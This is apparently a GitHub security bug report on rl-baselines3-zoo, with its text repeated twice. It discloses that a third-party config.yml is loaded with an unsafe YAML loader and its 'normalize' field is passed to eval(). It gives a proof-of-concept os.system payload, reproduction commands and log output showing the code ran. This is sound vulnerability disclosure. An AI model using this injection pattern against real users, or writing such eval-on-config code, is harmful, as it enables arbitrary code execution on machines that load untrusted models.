🐛 Bug
Description
The rl-baselines3-zoo model loading pipeline accepts remote config.yml files that are parsed and later evaluates the normalize field using eval(). These values are loaded and executed in get_saved_hyperparams() when users download and run third-party model repositories.
|
config_file = os.path.join(stats_path, "config.yml") |
|
if os.path.isfile(config_file): |
|
# Load saved hyperparameters |
|
with open(os.path.join(stats_path, "config.yml")) as f: |
|
hyperparams = yaml.load(f, Loader=yaml.UnsafeLoader) |
|
hyperparams["normalize"] = hyperparams.get("normalize", False) |
|
else: |
|
obs_rms_path = os.path.join(stats_path, "obs_rms.pkl") |
|
hyperparams["normalize"] = os.path.isfile(obs_rms_path) |
|
|
|
# Load normalization params |
|
if hyperparams["normalize"]: |
|
if isinstance(hyperparams["normalize"], str): |
|
normalize_kwargs = eval(hyperparams["normalize"]) |
An attacker can publish a benign-looking model repository whose config.yml contains a malicious normalize field. When a victim downloads and loads the model using rl_zoo3 commands, the configuration file is deserialized and the attacker-controlled payload is evaluated, resulting in arbitrary code execution.
- - - batch_size
- 256
- - normalize
- os.system('echo "You have been hacked!!!" && touch /tmp/hacked.txt')
This allows attackers to embed malicious commands in model configuration files and achieve remote code execution on victim machines during normal model loading and evaluation.
To Reproduce
I uploaded a proof-of-concept model repository on Huggingface for reproduction: https://huggingface.co/XManFromXlab/ppo-BreakoutNoFrameskip-v4
python -m rl_zoo3.load_from_hub --algo ppo --env BreakoutNoFrameskip-v4 -orga XManFromXlab -f logs/
python -m rl_zoo3.enjoy --algo ppo --env BreakoutNoFrameskip-v4 -f logs/
In this example, running the above commands will execute the attacker-controlled payload:
echo "You have been hacked!!!" && touch /tmp/hacked.txt
After execution, the file /tmp/hacked.txt is created, demonstrating successful arbitrary code execution.
Relevant log output / Error message
Loading latest experiment, id=1
Loading logs/ppo/BreakoutNoFrameskip-v4_1/BreakoutNoFrameskip-v4.zip
You have been hacked!!!
System Info
- OS: Linux-6.8.0-88-generic-x86_64-with-glibc2.39 # 89-Ubuntu SMP PREEMPT_DYNAMIC Sat Oct 11 01:02:46 UTC 2025
- Python: 3.12.3
- Stable-Baselines3: 2.8.0a2
- PyTorch: 2.10.0+cu128
- GPU Enabled: True
- Numpy: 2.4.2
- Cloudpickle: 3.1.2
- Gymnasium: 1.2.3
- OpenAI Gym: 0.26.2
Checklist
🐛 Bug
Description
The rl-baselines3-zoo model loading pipeline accepts remote
config.ymlfiles that are parsed and later evaluates thenormalizefield usingeval(). These values are loaded and executed inget_saved_hyperparams()when users download and run third-party model repositories.rl-baselines3-zoo/rl_zoo3/utils.py
Lines 425 to 438 in d29756c
An attacker can publish a benign-looking model repository whose
config.ymlcontains a maliciousnormalizefield. When a victim downloads and loads the model usingrl_zoo3commands, the configuration file is deserialized and the attacker-controlled payload is evaluated, resulting in arbitrary code execution.This allows attackers to embed malicious commands in model configuration files and achieve remote code execution on victim machines during normal model loading and evaluation.
To Reproduce
I uploaded a proof-of-concept model repository on Huggingface for reproduction: https://huggingface.co/XManFromXlab/ppo-BreakoutNoFrameskip-v4
In this example, running the above commands will execute the attacker-controlled payload:
After execution, the file
/tmp/hacked.txtis created, demonstrating successful arbitrary code execution.Relevant log output / Error message
Loading latest experiment, id=1 Loading logs/ppo/BreakoutNoFrameskip-v4_1/BreakoutNoFrameskip-v4.zip You have been hacked!!!System Info
Checklist